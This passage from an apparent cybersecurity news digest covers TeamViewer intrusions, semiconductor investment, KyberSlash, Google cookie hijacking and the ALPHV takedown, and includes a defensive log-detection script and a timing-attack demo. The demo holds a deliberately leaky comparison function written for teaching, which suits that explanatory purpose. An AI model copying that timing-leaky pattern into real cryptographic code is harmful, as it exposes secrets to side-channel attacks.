Another instance featured a data exfiltration campaign, which Huntress investigated in December. According to the incident logs, the threat actor established an initial foothold in the victim environment using TeamViewer. Much earlier, in 2020, Kaspersky reported on attacks against industrial control system setups that used remote access tools like RMS and TeamViewer for first access.
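Two of the observations above lend themselves to simple log-based detection: a remote session arriving after a long period with no logins at all, and the same remote hostname showing up on more than one endpoint. The following is an added example, not Huntress' tooling or any TeamViewer-supplied code; it parses constructed, tab-separated records in a layout modelled on a TeamViewer incoming-connection log (remote ID, remote display name, start, end, local user, connection type, connection GUID; the layout and every value are assumptions) and flags sessions from a remote ID never seen before on that endpoint, sessions that follow a dormant gap longer than a threshold, and remote IDs that reach several endpoints.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample records, keyed by the monitored endpoint that wrote them.
# Layout is an assumption modelled on a TeamViewer incoming-connection log;
# none of these IDs, names or times are real.
SAMPLE_LOGS = {
    "host-A": [
        "111111111\tADMIN-WS\t03-07-2023 09:12:00\t03-07-2023 09:40:00\tjsmith\tRemoteControl\t{guid-1}",
        "111111111\tADMIN-WS\t18-07-2023 14:02:00\t18-07-2023 14:30:00\tjsmith\tRemoteControl\t{guid-2}",
        "222222222\tWIN-UNKNOWN\t12-01-2024 21:17:00\t12-01-2024 21:24:00\tjsmith\tRemoteControl\t{guid-3}",
    ],
    "host-B": [
        "333333333\tHELPDESK-01\t10-01-2024 10:00:00\t10-01-2024 10:20:00\tmlee\tRemoteControl\t{guid-4}",
        "222222222\tWIN-UNKNOWN\t12-01-2024 22:05:00\t12-01-2024 22:16:00\tmlee\tRemoteControl\t{guid-5}",
    ],
}

TIME_FMT = "%d-%m-%Y %H:%M:%S"  # assumed day-month-year layout of the sample


def parse_line(line: str) -> dict:
    """Split one tab-separated record into named fields with parsed timestamps."""
    remote_id, remote_name, start, end, local_user, conn_type, guid = line.split("\t")
    return {
        "remote_id": remote_id,
        "remote_name": remote_name,
        "start": datetime.strptime(start, TIME_FMT),
        "end": datetime.strptime(end, TIME_FMT),
        "local_user": local_user,
        "conn_type": conn_type,
        "guid": guid,
    }


def find_suspicious(logs: dict, dormant_days: int = 30) -> list:
    """Per endpoint, flag sessions from a never-before-seen remote ID and sessions
    that follow a gap longer than `dormant_days` since the previous session.
    The first session on an endpoint is treated as baseline and never flagged."""
    alerts = []
    for endpoint, lines in logs.items():
        sessions = sorted((parse_line(l) for l in lines), key=lambda s: s["start"])
        seen_ids = set()
        previous = None
        for s in sessions:
            reasons = []
            if previous is not None:
                if s["remote_id"] not in seen_ids:
                    reasons.append("new_remote_id")
                if (s["start"] - previous["start"]).days > dormant_days:
                    reasons.append("dormant_gap")
            seen_ids.add(s["remote_id"])
            previous = s
            if reasons:
                alerts.append({
                    "endpoint": endpoint,
                    "remote_id": s["remote_id"],
                    "remote_name": s["remote_name"],
                    "start": s["start"],
                    "minutes": round((s["end"] - s["start"]).total_seconds() / 60),
                    "reasons": reasons,
                })
    return alerts


def shared_remote_sources(logs: dict) -> dict:
    """Remote IDs that connected to two or more endpoints, mapped to those endpoints."""
    reach = defaultdict(set)
    for endpoint, lines in logs.items():
        for l in lines:
            reach[parse_line(l)["remote_id"]].add(endpoint)
    return {rid: hosts for rid, hosts in reach.items() if len(hosts) >= 2}


if __name__ == "__main__":
    for a in find_suspicious(SAMPLE_LOGS):
        print(f"{a['endpoint']}: {a['remote_name']} ({a['remote_id']}) at {a['start']} "
              f"for {a['minutes']} min -> {', '.join(a['reasons'])}")
    for rid, hosts in shared_remote_sources(SAMPLE_LOGS).items():
        print(f"remote {rid} reached {sorted(hosts)}")
```

Run against a real export, the two checks complement each other: the dormant-gap rule catches the "no logins for months, then one" pattern Carvey describes, while the shared-source rule surfaces a single remote machine fanning out across endpoints, which is what tied the two Huntress incidents together.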

Here's Why the World is Investing So Much in Semiconductors


Hannah Mullane, a BBC correspondent, recently visited Pragmatic Semiconductor, the UK's newest computer chip facility in Durham. Formerly a ceramic pipe factory, from the outside it looks like a large warehouse.

However, the large site is being turned into a sophisticated computer chip production hub. Pragmatic Semiconductor has already developed one production line, commonly known as a fabrication line or fab line. 

Enclosed within a spacious chamber, the manufacturing line is equipped with all the costly tools required to manufacture computer chips, and the air quality is constantly regulated to prevent any contamination while the manufacturing process is underway.

Pragmatic has the funds to build another such production line, and an investment of £182 million ($230 million) announced late this year will go into production lines 3 and 4. 

In addition to private investors, Pragmatic secured funding from British Patient Capital, a division of British Business Bank, and the government-backed UK Infrastructure Bank. However, the Cambridge-based firm will require a lot more funding to wrap up the eight production lines it has planned to install in the old pipe plant. 

From phones and computers to cars and washing machines, practically every product with an on/off switch is dependent on the production of computer chips, also known as semiconductors.

It is an industry that has experienced significant turmoil in recent years. During the pandemic, supply lines were disrupted, and geopolitical tensions arose in Asia, which manufactures 90% of the world's most advanced chips. 

David Moore, CEO of Pragmatic Semiconductor, the largest semiconductor maker in the UK, believes the industry will require a variety of semiconductors to handle "different kinds of problems" in the chip industry. 

Most semiconductors are made of silicon, but Pragmatic uses an alternative process. Rather than sitting on a silicon wafer, its chips are built on a thin, flexible sheet. This approach produces chips that are cheaper and faster to manufacture than traditional silicon chips.

"If you take a standard silicon manufacturing facility, it's going to take multiple years and billions of dollars to make," Mr Moore said. "Our fabrication plant can be 10 to 100 times cheaper depending on what you compare it with. In silicon, it will take three to six months to go from the start of the process all the way to a finished wafer product. For us, we can do that in less than 48 hours.” 

But it is no panacea. The most sophisticated silicon-based computer chips will still be required to run phones, computers, and other cutting-edge technology, even though flexible chips can be manufactured more quickly and at a lower cost.

A significant shortage of such chips in 2021 illustrated how reliant the global industry is on a few key suppliers. For example, 90% of the most advanced semiconductors manufactured worldwide are produced by Taiwan Semiconductor Manufacturing Company (TSMC). 

To reduce that dependency, governments are investing enormous sums to develop more robust local semiconductor sectors. In August 2022, the US government signed the US Chips Act, which pledged $52 billion (£41 billion) to increase domestic computer chip production. 

The European Union has its own initiative of €43 billion (£37 billion). On a smaller scale, the UK has agreed to invest £1 billion in the sector. Analysts believe that large chip manufacturers are responding to such government incentives. 

Following the US Chips Act, approximately 500 firms applied to the US government for project financing, according to Hannah Dohmen, a research analyst at Georgetown's Centre for Security and Emerging Technology in Washington. 

Plants are planned for New York, Arizona, Texas, Ohio, and Idaho, she says. Other projects are also being planned outside of the United States and Europe.

"We're also seeing India attempt to enter the chip manufacturing space. A country that has a strong history in chip design but will be starting from scratch in manufacturing," Ms Dohmen added. "India is looking to be a big player in space, and with intensifying competition with China. This has prompted the US and other allied countries to strengthen tech cooperation with India.”

It all seems extremely promising, but establishing computer chip plants is not straightforward. TSMC's plans to develop advanced semiconductors in Arizona have stalled, with the company blaming a dearth of experienced labour. Security experts are also concerned that the rush to develop plants in Europe and the United States would simply replicate what already exists in Asia.

Implementation Flaws Identified in Post-Quantum Encryption Algorithm


Two implementation flaws have been identified in the Kyber key encapsulation mechanism (KEM), an encryption standard intended to safeguard networks from future attacks by quantum computers. Collectively known as "KyberSlash," these flaws could allow cybercriminals to discover encryption keys. 

“Timing attacks of this nature are a derivative of broader ‘side channel’ attacks, which can be used to undermine any type of encryption, including both classical and post-quantum algorithms,” Andersen Cheng, founder of Post-Quantum, explained. “With this type of attack, the adversaries send fake (and known) ciphertext and measure how long it takes to decipher. They can then infer the timings for each attempt and reverse engineer the actual key-pair.” 

On December 1st, Franziskus Kiefer, Goutam Tamvada, and Karthikeyan Bhargavan, all researchers at the cybersecurity firm Cryspen, reported the vulnerabilities to Kyber's development team. A patch was released immediately, but because the issue was not classified as a security vulnerability, Cryspen began notifying projects on December 15 that they needed to apply the fix. 

Google, Signal, and Mullvad VPN have all adopted versions of the Kyber post-quantum encryption standard; however, Mullvad VPN has since confirmed that the vulnerability does not affect their services.

Post-quantum encryption rush

Kyber was first submitted for assessment to the US National Institute of Standards and Technology (NIST) in 2017, as part of the organisation's competition to test and approve an encryption standard capable of safeguarding networks against future quantum computer attacks. Though a machine with enough qubits to run Shor's algorithm against RSA and similar standards has yet to be built, recent breakthroughs in scaling quantum computers and mounting speculation about "Harvest Now, Decrypt Later" attacks have increased interest in adopting post-quantum standards among governments and large businesses. 

Several algorithms entered into the NIST competition were shown to be susceptible to conventional attacks. These include the Rainbow and SIKE standards, the latter of which was broken by KU Leuven researchers in 2022 in less than an hour on an ordinary computer. In February 2023, a team from Sweden's KTH Royal Institute of Technology used deep learning-based side-channel attacks against Kyber's official implementation, CRYSTALS-Kyber. Even so, Kyber was one of six approaches for which NIST published draft standards last summer, with plans to finalise the competition later this year. 

Kyber flaws 

Meanwhile, the Kyber KEM has been adopted by a number of major organisations. Google announced in August 2023 that it would use Kyber-768 as part of a hybrid scheme to protect Chrome browser traffic at the TLS layer. Similarly, in September Signal hardened the Signal Protocol, which also provides end-to-end encryption for Google and WhatsApp conversations, by combining Kyber-1024 with an elliptic curve key agreement protocol. 

This hybrid approach to deploying post-quantum encryption standards is intended to keep network traffic protected in case new vulnerabilities are discovered. Since the KyberSlash vulnerabilities were identified, the researchers say that patches have been applied by the Kyber development team and AWS. The team also cited a GitHub library written by Kudelski Security. When approached by a local media outlet, the firm stated that the listed code was not used in any of its commercial products and should not be used in production, but that it had nevertheless incorporated a patch for the KyberSlash vulnerabilities in a new version of the library. 

Nevertheless, Cheng believes it is a significant step forward for the post-quantum encryption community, because its focus has shifted from flaws in the mathematics underpinning the standards to implementation attacks. “It will be the responsibility of each organisation implementing new encryption to ensure the implementation is robust,” stated Cheng. “That’s why it is so important that teams working on the migration to post-quantum encryption have deep engineering understanding and ideally, existing experience in deploying the cryptographic algorithms.”
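Cheng's description of a timing attack, measuring how long a decapsulation takes for attacker-chosen ciphertexts, rests on one principle: if the amount of work a routine does depends on secret data, the secret leaks through the clock. The added example below is not Kyber code and does not reproduce the specific KyberSlash code path, which the article does not detail; it illustrates the general principle with two ways of comparing a secret byte string against a submitted one, the kind of check a KEM performs when it verifies a re-encrypted ciphertext against the one it received. An operation counter stands in for wall-clock time so the result is deterministic; the secret and guess values are constructed.

```python
class OpCounter:
    """Counts byte comparisons; a deterministic stand-in for elapsed time."""

    def __init__(self) -> None:
        self.ops = 0


def leaky_equal(secret: bytes, guess: bytes, counter: OpCounter) -> bool:
    """Early-exit comparison: stops at the first mismatching byte, so the work
    done (and the time taken) reveals how long the matching prefix is."""
    if len(secret) != len(guess):
        return False
    for x, y in zip(secret, guess):
        counter.ops += 1
        if x != y:
            return False
    return True


def constant_time_equal(secret: bytes, guess: bytes, counter: OpCounter) -> bool:
    """Constant-time comparison: always touches every byte and folds the
    differences into one accumulator, so the work is independent of the input."""
    if len(secret) != len(guess):
        return False
    diff = 0
    for x, y in zip(secret, guess):
        counter.ops += 1
        diff |= x ^ y
    return diff == 0


def work_profile(check, secret: bytes, guesses: list) -> list:
    """Operation count for each guess, as an attacker timing the check would see it."""
    profile = []
    for g in guesses:
        c = OpCounter()
        check(secret, g, c)
        profile.append(c.ops)
    return profile


def leaks(profile: list) -> bool:
    """A check leaks if different inputs produce different amounts of work."""
    return len(set(profile)) > 1


# Constructed values: a 4-byte secret and guesses that match 0, 1, 2 and 3 leading bytes.
SECRET = b"\xa1\xb2\xc3\xd4"
GUESSES = [
    b"\x00\x00\x00\x00",
    b"\xa1\x00\x00\x00",
    b"\xa1\xb2\x00\x00",
    b"\xa1\xb2\xc3\x00",
]

if __name__ == "__main__":
    for name, fn in (("early-exit", leaky_equal), ("constant-time", constant_time_equal)):
        profile = work_profile(fn, SECRET, GUESSES)
        print(f"{name:14s} work per guess: {profile}  leaks={leaks(profile)}")
```

With the early-exit check the work grows by one for every correct leading byte, so an adversary can confirm the secret one byte at a time; the constant-time version does the same work for every guess. In real code the same idea applies to every secret-dependent operation, not just comparisons, which is why library authors audit arithmetic and branches as well; for comparisons in Python, the standard library's `hmac.compare_digest` already implements the constant-time form.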

Hackers Find a Way to Gain Password-Free Access to Google Accounts


Cybercriminals find new ways to access Google accounts

Cybersecurity researchers have found a way for hackers to access the Google accounts of victims without using the victims' passwords.

According to the research, hackers are already actively testing a potentially harmful type of malware that exploits third-party cookies to obtain unauthorized access to people's personal information.

The attack was first made public in October 2023, when a hacker shared information about it in a Telegram channel.

The cookie exploit

The post explained how cookies, which websites and browsers use to track users and make sites more efficient and usable, could be abused to compromise accounts.

Users can access their accounts without continuously entering their login credentials thanks to Google authentication cookies, but the hackers discovered a way of restoring these cookies to evade two-factor authentication.

What has Google said?

With a market share of over 60% last year, Google Chrome is the most popular web browser in the world. Currently, the browser is taking aggressive measures to block third-party cookies.

Google said: “We routinely upgrade our defenses against such techniques and to secure users who fall victim to malware. In this instance, Google has taken action to secure any compromised accounts detected. Users should continually take steps to remove any malware from their computer, and we recommend turning on Enhanced Safe Browsing in Chrome to protect against phishing and malware downloads.”

What's next?

The cybersecurity researchers who first found the threat said it “underscores the complexity and stealth” of modern cyber attacks.

The security flaw was described by intelligence researcher Pavan Karthick M. in a report titled "Compromising Google accounts: Malware exploiting undocumented OAuth2 functionality for session hijacking."

Karthick M further stated that in order to keep ahead of new cyber threats, technical vulnerabilities and human intelligence sources must be continuously monitored. 

“This analysis underscores the complexity and stealth of modern cyber threats. It highlights the necessity for continuous monitoring of both technical vulnerabilities and human intelligence sources to stay ahead of emerging cyber threats. The collaboration of technical and human intelligence is crucial in uncovering and understanding sophisticated exploits like the one analyzed in this report,” says the blog post. 

Integrating the Power of AI and Blockchain for Data Security and Transparency


In an ever-changing digital landscape, providing strong data security and transparency has become critical. This article explores the dynamic interaction of two transformational technologies: artificial intelligence (AI) and blockchain. 

AI improves data security

Artificial intelligence (AI) is critical for enhancing data security via advanced technology and proactive techniques. Machine learning techniques offer real-time threat detection by recognising patterns and abnormalities that indicate potential security breaches. Predictive analytics assesses and anticipates threats, enabling proactive intervention. Furthermore, AI-driven anomaly detection improves the ability to quickly identify and respond to emerging security concerns. 

Blockchain, a transformational force, enables unparalleled data transparency. Its decentralised and immutable ledger structure means that once data is recorded, it cannot be changed or tampered with, instilling trust in information integrity. Smart contracts, a critical component of blockchain technology, automate and transparently enforce established rules, improving overall data governance. Blockchain provides a secure and transparent framework, making it an effective solution for industries looking to establish trust, traceability, and accountability within their data ecosystems.

Synergies in AI and blockchain

The synergies between AI and Blockchain form a potent combination, tackling an array of data security and transparency concerns. AI's analytical capabilities strengthen blockchain functionality by allowing for advanced data analytics on a decentralised ledger. AI-powered algorithms help to detect trends, anomalies, and potential security threats within the blockchain network, hence strengthening overall security measures. Furthermore, AI-driven verification methods improve the accuracy and dependability of blockchain-stored data, increasing trustworthiness and transparency of information. This collaborative integration enables a more resilient and efficient approach to overseeing and safeguarding data in the digital era. 

Challenges with integration 

Blockchain and AI integration is not without obstacles, though. As AI systems make decisions, ethical issues surface, requiring constant oversight to avoid prejudices and ensure fairness. Blockchain networks continue to face scalability issues, requiring solutions for increasing transaction volumes. Another level of complexity is added by regulatory compliance, which necessitates a careful balancing act between innovation and legal framework compliance. 

The future of AI and Blockchain in terms of data security and transparency is bright, notwithstanding these obstacles. It is likely that constant development will enhance the synergy between these revolutionary technologies, expanding the limits of what is feasible.

International Authorities Take Down ALPHV ransomware Gang’s Dark Web Leak Site


An international group of law enforcement groups has taken down the dark web leak site of the notorious ransomware gang known as ALPHV, or BlackCat. 

"The Federal Bureau of Investigation seized this site as part of a coordinated law enforcement action taken against ALPHV Blackcat Ransomware," a message currently reads on the gang's dark web leak site. 

According to the press release, law enforcement agencies from the United Kingdom, Denmark, Germany, Spain, and Australia were also involved in the takedown operation. 

The US Department of Justice later confirmed the disruption, stating that the global takedown effort, led by the FBI, allowed US officials to obtain visibility into the ransomware group's computer and seize "several websites" that ALPHV operated. 

Additionally, the FBI released a decryption tool that has already helped over 500 victims of the ALPHV ransomware recover their systems. (The number of victims is 400 according to the government's search warrant.) The tool helped several victims in the US avoid paying ransom demands that came to around $68 million. 

According to the government's notification, ALPHV stole hundreds of millions of dollars by breaking into the networks of over a thousand victims worldwide. The gang has targeted vital infrastructure in the United States, including government structures, emergency services, defence industrial base companies, critical manufacturing, healthcare and public health facilities, and other businesses, educational institutions, and governmental entities. 

The FBI said it worked with a “confidential human source” linked to the ransomware gang, which granted agents access to the ALPHV/BlackCat affiliate panel that the gang used to manage its victims, according to the government's search warrant. The State Department previously stated that it will reward those who offer insights "about Blackcat, their affiliates, or activities.” 

“In disrupting the BlackCat ransomware group, the Justice Department has once again hacked the hackers,” stated U.S. deputy attorney general Lisa Monaco in remarks. “With a decryption tool provided by the FBI to hundreds of ransomware victims worldwide, businesses and schools were able to reopen, and healthcare and emergency services were able to come back online. We will continue to prioritize disruptions and place victims at the center of our strategy to dismantle the ecosystem fueling cybercrime.” 

In recent years, the ALPHV/BlackCat ransomware group has been one of the most active and devastating. ALPHV, which is believed to be a successor to the now-defunct sanctioned REvil hacking gang, claims to have infiltrated a number of high-profile victims, including news-sharing site Reddit, healthcare provider Norton, and the United Kingdom's Barts Health NHS Trust. 

The group's tactics have become more aggressive in recent months. In November, ALPHV filed a first-of-its-kind complaint with the U.S. Securities and Exchange Commission (SEC), alleging that digital lending provider MeridianLink had failed to disclose "a significant breach compromising customer data and operational information," a breach the gang itself claimed responsibility for.

HackersEra Launches Telecom Penetration Testing to Eliminate Cyber Threats


Cybercriminals have attacked telecom infrastructure, particularly as it shifts to an IP-based design with the introduction of Long-Term Evolution (LTE) networks, also referred to as 4G. Persistent attackers could spy on users' cellular traffic and record data flows by exploiting security vulnerabilities in the LTE mobile standard. 

HackersEra, a prominent Indian cybersecurity service provider with a global footprint, has introduced 'Telecom Penetration Testing', a service intended to help the telecom sector in India and around the world strengthen its network security posture, minimise the risk of attacks, and increase operational efficiency. 

The telecom industry has grown at an astounding rate, especially in the developing economies of South America, Africa, and Asia. As a result, networks have expanded significantly, new services have been added, and the system as a whole has become increasingly complicated. Security, however, is frequently ignored or marginalised in favour of growing market share and cutting expenses. Attackers do not care about the economics, and they have begun targeting telecom infrastructure as LTE drives the move to an IP-based design. 

This, combined with stronger telecom security laws, continues to be a formidable barrier for carriers to overcome. Despite the fact that there are several security challenges, telcos' experiences have shown that some of them can be resolved, while others will continue to be a known threat unless cost-effective solutions are devised. 

HackersEra covers every angle while assessing the security of a telecom infrastructure. The company's strategy for boosting operational efficiency in the telecom industry includes pre-engagement, scoping, asset classification, risk assessment and risk treatment, vulnerability analysis, penetration testing, employee training, and support.

HackersEra is home to a team of researchers who are experts in the latest developments in telecommunications technology, including 2G, 3G, 4G, and 5G. The team has probed and investigated telecom network interfaces such as the Air Interface, Backhaul Interface, Core Network, and Roaming Interface. The company has developed security testing automation tools that specialists with less security experience can use. 

The company, launched in 2015 in Pune, Maharashtra by Vikash Chaudhary, is an industry-leading cybersecurity service provider known for introducing innovative, adaptive business processes that bring increased security and productivity to enterprises. In the seven years since its inception, the group has expanded globally, particularly in Asia, the Americas, and Africa.